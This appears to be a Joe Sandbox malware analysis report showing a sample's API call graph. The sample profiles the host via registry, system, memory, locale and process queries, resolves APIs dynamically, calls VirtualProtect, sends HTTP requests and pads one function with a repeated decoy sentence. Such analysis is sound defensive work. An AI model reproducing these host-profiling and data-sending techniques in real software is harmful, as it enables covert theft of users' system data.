14903 e22109 14902->14903 15507 e27e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14903->15507 14906 e2a9b0 4 API calls 14907 e22129 14906->14907 14908 e2a8a0 lstrcpy 14907->14908 14909 e22132 14908->14909 14910 e2a9b0 4 API calls 14909->14910 14911 e22151 14910->14911 14912 e2a8a0 lstrcpy 14911->14912 14913 e2215a 14912->14913 14914 e2a9b0 4 API calls 14913->14914 14915 e2217b 14914->14915 14916 e2a8a0 lstrcpy 14915->14916 14917 e22184 14916->14917 15511 e27f60 14917->15511 14920 e2a9b0 4 API calls 14921 e221a4 14920->14921 14922 e2a8a0 lstrcpy 14921->14922 14923 e221ad 14922->14923 14924 e2a9b0 4 API calls 14923->14924 14925 e221cc 14924->14925 14926 e2a8a0 lstrcpy 14925->14926 14927 e221d5 14926->14927 14928 e2a9b0 4 API calls 14927->14928 14929 e221f6 14928->14929 14930 e2a8a0 lstrcpy 14929->14930 14931 e221ff 14930->14931 15524 e27ed0 GetSystemInfo wsprintfA 14931->15524 14934 e2a9b0 4 API calls 14935 e2221f 14934->14935 14936 e2a8a0 lstrcpy 14935->14936 14937 e22228 14936->14937 14938 e2a9b0 4 API calls 14937->14938 14939 e22247 14938->14939 14940 e2a8a0 lstrcpy 14939->14940 14941 e22250 14940->14941 14942 e2a9b0 4 API calls 14941->14942 14943 e22270 14942->14943 14944 e2a8a0 lstrcpy 14943->14944 14945 e22279 14944->14945 15526 e28100 GetProcessHeap RtlAllocateHeap 14945->15526 14948 e2a9b0 4 API calls 14949 e22299 14948->14949 14950 e2a8a0 lstrcpy 14949->14950 14951 e222a2 14950->14951 14952 e2a9b0 4 API calls 14951->14952 14953 e222c1 14952->14953 14954 e2a8a0 lstrcpy 14953->14954 14955 e222ca 14954->14955 14956 e2a9b0 4 API calls 14955->14956 14957 e222eb 14956->14957 14958 e2a8a0 lstrcpy 14957->14958 14959 e222f4 14958->14959 15532 e287c0 14959->15532 14962 e2a920 3 API calls 14963 e2231e 14962->14963 14964 e2a8a0 lstrcpy 14963->14964 14965 e22327 14964->14965 14966 e2a9b0 4 API calls 14965->14966 14967 e22351 14966->14967 14968 e2a8a0 lstrcpy 14967->14968 14969 e2235a 14968->14969 14970 e2a9b0 4 API calls 14969->14970 14971 e2237a 14970->14971 14972 e2a8a0 lstrcpy 14971->14972 14973 e22383 14972->14973 14974 e2a9b0 4 API calls 14973->14974 14975 e223a2 14974->14975 14976 e2a8a0 lstrcpy 14975->14976 14977 e223ab 14976->14977 15537 e281f0 14977->15537 14979 e223c2 14980 e2a920 3 API calls 14979->14980 14981 e223d5 14980->14981 14982 e2a8a0 lstrcpy 14981->14982 14983 e223de 14982->14983 14984 e2a9b0 4 API calls 14983->14984 14985 e2240a 14984->14985 14986 e2a8a0 lstrcpy 14985->14986 14987 e22413 14986->14987 14988 e2a9b0 4 API calls 14987->14988 14989 e22432 14988->14989 14990 e2a8a0 lstrcpy 14989->14990 14991 e2243b 14990->14991 14992 e2a9b0 4 API calls 14991->14992 14993 e2245c 14992->14993 14994 e2a8a0 lstrcpy 14993->14994 14995 e22465 14994->14995 14996 e2a9b0 4 API calls 14995->14996 14997 e22484 14996->14997 14998 e2a8a0 lstrcpy 14997->14998 14999 e2248d 14998->14999 15000 e2a9b0 4 API calls 14999->15000 15001 e224ae 15000->15001 15002 e2a8a0 lstrcpy 15001->15002 15003 e224b7 15002->15003 15545 e28320 15003->15545 15005 e224d3 15006 e2a920 3 API calls 15005->15006 15007 e224e6 15006->15007 15008 e2a8a0 lstrcpy 15007->15008 15009 e224ef 15008->15009 15010 e2a9b0 4 API calls 15009->15010 15011 e22519 15010->15011 15012 e2a8a0 lstrcpy 15011->15012 15013 e22522 15012->15013 15014 e2a9b0 4 API calls 15013->15014 15015 e22543 15014->15015 15016 e2a8a0 lstrcpy 15015->15016 15017 e2254c 15016->15017 15018 e28320 17 API calls 15017->15018 15019 e22568 15018->15019 15020 e2a920 3 API calls 15019->15020 15021 e2257b 15020->15021 15022 e2a8a0 lstrcpy 15021->15022 15023 e22584 15022->15023 15024 e2a9b0 4 API calls 15023->15024 15025 e225ae 15024->15025 15026 e2a8a0 lstrcpy 15025->15026 15027 e225b7 15026->15027 15028 e2a9b0 4 API calls 15027->15028 15029 e225d6 15028->15029 15030 e2a8a0 lstrcpy 15029->15030 15031 e225df 15030->15031 15032 e2a9b0 4 API calls 15031->15032 15033 e22600 15032->15033 15034 e2a8a0 lstrcpy 15033->15034 15035 e22609 15034->15035 15581 e28680 15035->15581 15037 e22620 15038 e2a920 3 API calls 15037->15038 15039 e22633 15038->15039 15040 e2a8a0 lstrcpy 15039->15040 15041 e2263c 15040->15041 15042 e2265a lstrlen 15041->15042 15043 e2266a 15042->15043 15044 e2a740 lstrcpy 15043->15044 15045 e2267c 15044->15045 15046 e11590 lstrcpy 15045->15046 15047 e2268d 15046->15047 15591 e25190 15047->15591 15049 e22699 15049->13481 15779 e2aad0 15050->15779 15052 e15009 InternetOpenUrlA 15053 e15021 15052->15053 15054 e150a0 InternetCloseHandle InternetCloseHandle 15053->15054 15055 e1502a InternetReadFile 15053->15055 15056 e150ec 15054->15056 15055->15053 15056->13485 15780 e198d0 15057->15780 15059 e20759 15060 e20a38 15059->15060 15061 e2077d 15059->15061 15062 e11590 lstrcpy 15060->15062 15063 e20799 StrCmpCA 15061->15063 15064 e20a49 15062->15064 15065 e207a8 15063->15065 15092 e20843 15063->15092 15956 e20250 15064->15956 15068 e2a7a0 lstrcpy 15065->15068 15070 e207c3 15068->15070 15069 e20865 StrCmpCA 15071 e20874 15069->15071 15109 e2096b 15069->15109 15072 e11590 lstrcpy 15070->15072 15073 e2a740 lstrcpy 15071->15073 15074 e2080c 15072->15074 15077 e20881 15073->15077 15075 e2a7a0 lstrcpy 15074->15075 15078 e20823 15075->15078 15076 e2099c StrCmpCA 15079 e20a2d 15076->15079 15080 e209ab 15076->15080 15081 e2a9b0 4 API calls 15077->15081 15082 e2a7a0 lstrcpy 15078->15082 15079->13489 15083 e11590 lstrcpy 15080->15083 15084 e208ac 15081->15084 15085 e2083e 15082->15085 15086 e209f4 15083->15086 15087 e2a920 3 API calls 15084->15087 15783 e1fb00 15085->15783 15089 e2a7a0 lstrcpy 15086->15089 15090 e208b3 15087->15090 15093 e20a0d 15089->15093 15091 e2a9b0 4 API calls 15090->15091 15094 e208ba 15091->15094 15092->15069 15095 e2a7a0 lstrcpy 15093->15095 15097 e2a8a0 lstrcpy 15094->15097 15096 e20a28 15095->15096 15899 e20030 15096->15899 15109->15076 15431 e2a7a0 lstrcpy 15430->15431 15432 e11683 15431->15432 15433 e2a7a0 lstrcpy 15432->15433 15434 e11695 15433->15434 15435 e2a7a0 lstrcpy 15434->15435 15436 e116a7 15435->15436 15437 e2a7a0 lstrcpy 15436->15437 15438 e115a3 15437->15438 15438->14312 15440 e147c6 15439->15440 15441 e14838 lstrlen 15440->15441 15465 e2aad0 15441->15465 15443 e14848 InternetCrackUrlA 15444 e14867 15443->15444 15444->14389 15446 e2a740 lstrcpy 15445->15446 15447 e28b74 15446->15447 15448 e2a740 lstrcpy 15447->15448 15449 e28b82 GetSystemTime 15448->15449 15451 e28b99 15449->15451 15450 e2a7a0 lstrcpy 15452 e28bfc 15450->15452 15451->15450 15452->14404 15454 e2a931 15453->15454 15455 e2a988 15454->15455 15458 e2a968 lstrcpy lstrcat 15454->15458 15456 e2a7a0 lstrcpy 15455->15456 15457 e2a994 15456->15457 15457->14407 15458->15455 15459->14522 15461 e19af9 LocalAlloc 15460->15461 15462 e14eee 15460->15462 15461->15462 15463 e19b14 CryptStringToBinaryA 15461->15463 15462->14410 15462->14412 15463->15462 15464 e19b39 LocalFree 15463->15464 15464->15462 15465->15443 15466->14532 15467->14673 15468->14675 15469->14683 15598 e277a0 15470->15598 15473 e276c6 RegOpenKeyExA 15475 e276e7 RegQueryValueExA 15473->15475 15476 e27704 RegCloseKey 15473->15476 15474 e21c1e 15474->14765 15475->15476 15476->15474 15478 e21c99 15477->15478 15478->14779 15480 e21e09 15479->15480 15480->14821 15482 e27a9a wsprintfA 15481->15482 15483 e21e84 15481->15483 15482->15483 15483->14835 15485 e21efe 15484->15485 15486 e27b4d 15484->15486 15485->14849 15605 e28d20 LocalAlloc CharToOemW 15486->15605 15489 e2a740 lstrcpy 15488->15489 15490 e27bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15489->15490 15493 e27c25 15490->15493 15491 e27c46 GetLocaleInfoA 15491->15493 15492 e27d18 15494 e27d28 15492->15494 15495 e27d1e LocalFree 15492->15495 15493->15491 15493->15492 15497 e2a8a0 lstrcpy 15493->15497 15498 e2a9b0 lstrcpy lstrlen lstrcpy lstrcat 15493->15498 15496 e2a7a0 lstrcpy 15494->15496 15495->15494 15499 e27d37 15496->15499 15497->15493 15498->15493 15499->14862 15501 e22008 15500->15501 15501->14877 15503 e29493 GetModuleFileNameExA CloseHandle 15502->15503 15504 e294b5 15502->15504 15503->15504 15505 e2a740 lstrcpy 15504->15505 15506 e22091 15505->15506 15506->14892 15508 e22119 15507->15508 15509 e27e68 RegQueryValueExA 15507->15509 15508->14906 15510 e27e8e RegCloseKey 15509->15510 15510->15508 15512 e27fb9 GetLogicalProcessorInformationEx 15511->15512 15513 e27fd8 GetLastError 15512->15513 15514 e28029 15512->15514 15516 e28022 15513->15516 15523 e27fe3 15513->15523 15518 e289f0 2 API calls 15514->15518 15519 e289f0 2 API calls 15516->15519 15520 e22194 15516->15520 15521 e2807b 15518->15521 15519->15520 15520->14920 15521->15516 15522 e28084 wsprintfA 15521->15522 15522->15520 15523->15512 15523->15520 15606 e289f0 15523->15606 15609 e28a10 GetProcessHeap RtlAllocateHeap 15523->15609 15525 e2220f 15524->15525 15525->14934 15527 e289b0 15526->15527 15528 e2814d GlobalMemoryStatusEx 15527->15528 15531 e28163 __aulldiv 15528->15531 15529 e2819b wsprintfA 15530 e22289 15529->15530 15530->14948 15531->15529 15533 e287fb GetProcessHeap RtlAllocateHeap wsprintfA 15532->15533 15535 e2a740 lstrcpy 15533->15535 15536 e2230b 15535->15536 15536->14962 15538 e2a740 lstrcpy 15537->15538 15544 e28229 15538->15544 15539 e28263 15541 e2a7a0 lstrcpy 15539->15541 15540 e2a9b0 lstrcpy lstrlen lstrcpy lstrcat 15540->15544 15542 e282dc 15541->15542 15542->14979 15543 e2a8a0 lstrcpy 15543->15544 15544->15539 15544->15540 15544->15543 15546 e2a740 lstrcpy 15545->15546 15547 e2835c RegOpenKeyExA 15546->15547 15548 e283d0 15547->15548 15549 e283ae 15547->15549 15551 e28613 RegCloseKey 15548->15551 15552 e283f8 RegEnumKeyExA 15548->15552 15550 e2a7a0 lstrcpy 15549->15550 15562 e283bd 15550->15562 15553 e2a7a0 lstrcpy 15551->15553 15554 e2860e 15552->15554 15555 e2843f wsprintfA RegOpenKeyExA 15552->15555 15553->15562 15554->15551 15556 e284c1 RegQueryValueExA 15555->15556 15557 e28485 RegCloseKey RegCloseKey 15555->15557 15558 e28601 RegCloseKey 15556->15558 15559 e284fa lstrlen 15556->15559 15560 e2a7a0 lstrcpy 15557->15560 15558->15554 15559->15558 15561 e28510 15559->15561 15560->15562 15563 e2a9b0 4 API calls 15561->15563 15562->15005 15564 e28527 15563->15564 15565 e2a8a0 lstrcpy 15564->15565 15566 e28533 15565->15566 15567 e2a9b0 4 API calls 15566->15567 15568 e28557 15567->15568 15569 e2a8a0 lstrcpy 15568->15569 15570 e28563 15569->15570 15571 e2856e RegQueryValueExA 15570->15571 15571->15558 15572 e285a3 15571->15572 15573 e2a9b0 4 API calls 15572->15573 15574 e285ba 15573->15574 15575 e2a8a0 lstrcpy 15574->15575 15576 e285c6 15575->15576 15577 e2a9b0 4 API calls 15576->15577 15578 e285ea 15577->15578 15579 e2a8a0 lstrcpy 15578->15579 15580 e285f6 15579->15580 15580->15558 15582 e2a740 lstrcpy 15581->15582 15583 e286bc CreateToolhelp32Snapshot Process32First 15582->15583 15584 e286e8 Process32Next 15583->15584 15585 e2875d CloseHandle 15583->15585 15584->15585 15589 e286fd 15584->15589 15586 e2a7a0 lstrcpy 15585->15586 15588 e28776 15586->15588 15587 e2a9b0 lstrcpy lstrlen lstrcpy lstrcat 15587->15589 15588->15037 15589->15584 15589->15587 15590 e2a8a0 lstrcpy 15589->15590 15590->15589 15592 e2a7a0 lstrcpy 15591->15592 15593 e251b5 15592->15593 15594 e11590 lstrcpy 15593->15594 15595 e251c6 15594->15595 15610 e15100 15595->15610 15597 e251cf 15597->15049 15601 e27720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15598->15601 15600 e276b9 15600->15473 15600->15474 15602 e27780 RegCloseKey 15601->15602 15603 e27765 RegQueryValueExA 15601->15603 15604 e27793 15602->15604 15603->15602 15604->15600 15605->15485 15607 e289f9 GetProcessHeap HeapFree 15606->15607 15608 e28a0c 15606->15608 15607->15608 15608->15523 15609->15523 15611 e2a7a0 lstrcpy 15610->15611 15612 e15119 15611->15612 15613 e147b0 2 API calls 15612->15613 15614 e15125 15613->15614 15770 e28ea0 15614->15770 15616 e15184 15617 e15192 lstrlen 15616->15617 15618 e151a5 15617->15618 15619 e28ea0 4 API calls 15618->15619 15620 e151b6 15619->15620 15621 e2a740 lstrcpy 15620->15621 15622 e151c9 15621->15622 15623 e2a740 lstrcpy 15622->15623 15624 e151d6 15623->15624 15625 e2a740 lstrcpy 15624->15625 15626 e151e3 15625->15626 15627 e2a740 lstrcpy 15626->15627 15628 e151f0 15627->15628 15629 e2a740 lstrcpy 15628->15629 15630 e151fd InternetOpenA StrCmpCA 15629->15630 15631 e1522f 15630->15631 15632 e158c4 InternetCloseHandle 15631->15632 15633 e28b60 3 API calls 15631->15633 15639 e158d9 codecvt 15632->15639 15634 e1524e 15633->15634 15635 e2a920 3 API calls 15634->15635 15636 e15261 15635->15636 15637 e2a8a0 lstrcpy 15636->15637 15638 e1526a 15637->15638 15640 e2a9b0 4 API calls 15638->15640 15643 e2a7a0 lstrcpy 15639->15643 15641 e152ab 15640->15641 15642 e2a920 3 API calls 15641->15642 15645 e152b2 15642->15645 15644 e15913 15643->15644 15644->15597 15646 e2a9b0 4 API calls 15645->15646 15647 e152b9 15646->15647 15648 e2a8a0 lstrcpy 15647->15648 15649 e152c2 15648->15649 15650 e2a9b0 4 API calls 15649->15650 15651 e15303 15650->15651 15652 e2a920 3 API calls 15651->15652 15653 e1530a 15652->15653 15654 e2a8a0 lstrcpy 15653->15654 15655 e15313 15654->15655 15656 e15329 InternetConnectA 15655->15656 15656->15632 15657 e15359 HttpOpenRequestA 15656->15657 15659 e158b7 InternetCloseHandle 15657->15659 15660 e153b7 15657->15660 15659->15632 15661 e2a9b0 4 API calls 15660->15661 15662 e153cb 15661->15662 15663 e2a8a0 lstrcpy 15662->15663 15664 e153d4 15663->15664 15665 e2a920 3 API calls 15664->15665 15666 e153f2 15665->15666 15667 e2a8a0 lstrcpy 15666->15667 15668 e153fb 15667->15668 15669 e2a9b0 4 API calls 15668->15669 15670 e1541a 15669->15670 15671 e2a8a0 lstrcpy 15670->15671 15672 e15423 15671->15672 15673 e2a9b0 4 API calls 15672->15673 15674 e15444 15673->15674 15675 e2a8a0 lstrcpy 15674->15675 15676 e1544d 15675->15676 15677 e2a9b0 4 API calls 15676->15677 15678 e1546e 15677->15678 15771 e28ea9 15770->15771 15772 e28ead CryptBinaryToStringA 15770->15772 15771->15616 15772->15771 15773 e28ece GetProcessHeap RtlAllocateHeap 15772->15773 15773->15771 15774 e28ef4 codecvt 15773->15774 15775 e28f05 CryptBinaryToStringA 15774->15775 15775->15771 15779->15052 16022 e19880 15780->16022 15782 e198e1 15782->15059 15784 e2a740 lstrcpy 15783->15784 15957 e2a740 lstrcpy 15956->15957 15958 e20266 15957->15958 15959 e28de0 2 API calls 15958->15959 15960 e2027b 15959->15960 15961 e2a920 3 API calls 15960->15961 15962 e2028b 15961->15962 15963 e2a8a0 lstrcpy 15962->15963 15964 e20294 15963->15964 15965 e2a9b0 4 API calls 15964->15965 16023 e1988e 16022->16023 16026 e16fb0 16023->16026 16025 e198ad codecvt 16025->15782 16029 e16d40 16026->16029 16030 e16d63 16029->16030 16044 e16d59 16029->16044 16045 e16530 16030->16045 16034 e16dbe 16034->16044 16055 e169b0 16034->16055 16036 e16e2a 16037 e16ee6 VirtualFree 16036->16037 16039 e16ef7 16036->16039 16036->16044 16037->16039 16038 e16f41 16040 e289f0 2 API calls 16038->16040 16038->16044 16039->16038 16041 e16f26 FreeLibrary 16039->16041 16042 e16f38 16039->16042 16040->16044 16041->16039 16043 e289f0 2 API calls 16042->16043 16043->16038 16044->16025 16046 e16542 16045->16046 16048 e16549 16046->16048 16065 e28a10 GetProcessHeap RtlAllocateHeap 16046->16065 16048->16044 16049 e16660 16048->16049 16054 e1668f VirtualAlloc 16049->16054 16051 e16730 16052 e16743 VirtualAlloc 16051->16052 16053 e1673c 16051->16053 16052->16053 16053->16034 16054->16051 16054->16053 16056 e169c9 16055->16056 16061 e169d5 16055->16061 16057 e16a09 LoadLibraryA 16056->16057 16056->16061 16058 e16a32 16057->16058 16057->16061 16059 e16ae0 16058->16059 16066 e28a10 GetProcessHeap RtlAllocateHeap 16058->16066 16059->16061 16063 e16ba8 GetProcAddress 16059->16063 16061->16036 16062 e16a8b 16062->16061 16064 e289f0 2 API calls 16062->16064 16063->16059 16063->16061 16064->16059 16065->16048 16066->16062

                                Executed Functions

                                Function 00E29860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 e29860-e29874 call e29750 663 e29a93-e29af2 LoadLibraryA * 5 660->663 664 e2987a-e29a8e call e29780 GetProcAddress * 21 660->664 666 e29af4-e29b08 GetProcAddress 663->666 667 e29b0d-e29b14 663->667 664->663 666->667 669 e29b46-e29b4d 667->669 670 e29b16-e29b41 GetProcAddress * 2 667->670 671 e29b68-e29b6f 669->671 672 e29b4f-e29b63 GetProcAddress 669->672 670->669 673 e29b71-e29b84 GetProcAddress 671->673 674 e29b89-e29b90 671->674 672->671 673->674 675 e29b92-e29bbc GetProcAddress * 2 674->675 676 e29bc1-e29bc2 674->676 675->676
                                APIs
                                • GetProcAddress.KERNEL32(75550000,008F0780), ref: 00E298A1
                                • GetProcAddress.KERNEL32(75550000,008F0798), ref: 00E298BA
                                • GetProcAddress.KERNEL32(75550000,008F0660), ref: 00E298D2
                                • GetProcAddress.KERNEL32(75550000,008F07B0), ref: 00E298EA
                                • GetProcAddress.KERNEL32(75550000,008F05A0), ref: 00E29903
                                • GetProcAddress.KERNEL32(75550000,008F89A0), ref: 00E2991B
                                • GetProcAddress.KERNEL32(75550000,008E6760), ref: 00E29933
                                • GetProcAddress.KERNEL32(75550000,008E67C0), ref: 00E2994C
                                • GetProcAddress.KERNEL32(75550000,008F0678), ref: 00E29964
                                • GetProcAddress.KERNEL32(75550000,008F07C8), ref: 00E2997C
                                • GetProcAddress.KERNEL32(75550000,008F05B8), ref: 00E29995
                                • GetProcAddress.KERNEL32(75550000,008F05D0), ref: 00E299AD
                                • GetProcAddress.KERNEL32(75550000,008E68A0), ref: 00E299C5
                                • GetProcAddress.KERNEL32(75550000,008F05E8), ref: 00E299DE
                                • GetProcAddress.KERNEL32(75550000,008F0600), ref: 00E299F6
                                • GetProcAddress.KERNEL32(75550000,008E6A00), ref: 00E29A0E
                                • GetProcAddress.KERNEL32(75550000,008F0690), ref: 00E29A27
                                • GetProcAddress.KERNEL32(75550000,008F08E8), ref: 00E29A3F
                                • GetProcAddress.KERNEL32(75550000,008E66C0), ref: 00E29A57
                                • GetProcAddress.KERNEL32(75550000,008F0888), ref: 00E29A70
                                • GetProcAddress.KERNEL32(75550000,008E68C0), ref: 00E29A88
                                • LoadLibraryA.KERNEL32(008F0870,?,00E26A00), ref: 00E29A9A
                                • LoadLibraryA.KERNEL32(008F08B8,?,00E26A00), ref: 00E29AAB
                                • LoadLibraryA.KERNEL32(008F0900,?,00E26A00), ref: 00E29ABD
                                • LoadLibraryA.KERNEL32(008F08A0,?,00E26A00), ref: 00E29ACF
                                • LoadLibraryA.KERNEL32(008F08D0,?,00E26A00), ref: 00E29AE0
                                • GetProcAddress.KERNEL32(75670000,008F0918), ref: 00E29B02
                                • GetProcAddress.KERNEL32(75750000,008F0858), ref: 00E29B23
                                • GetProcAddress.KERNEL32(75750000,008F8D18), ref: 00E29B3B
                                • GetProcAddress.KERNEL32(76BE0000,008F8CD0), ref: 00E29B5D
                                • GetProcAddress.KERNEL32(759D0000,008E6700), ref: 00E29B7E
                                • GetProcAddress.KERNEL32(773F0000,008F8940), ref: 00E29B9F
                                • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00E29BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00E29BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 96e6ca24d3d1d2d61d2dac37e1078f1c0733909c0ae53744a7192b94e80d881e
                                • Instruction ID: 1f3962cbe690c9c9a490ce9e755f6ded2f8ed1968a8f8ef1726db3d65149cc95
                                • Opcode Fuzzy Hash: 96e6ca24d3d1d2d61d2dac37e1078f1c0733909c0ae53744a7192b94e80d881e
                                • Instruction Fuzzy Hash: 08A10AB5710348DFD364EFA8E988A673BF9F78C301714975AA6868324CD63F9841CB60
                                Function 00E145C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 e145c0-e14695 RtlAllocateHeap 781 e146a0-e146a6 764->781 782 e146ac-e1474a 781->782 783 e1474f-e147a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E1460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E1479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E145E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E145F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E145C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E145DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E145D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14683
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
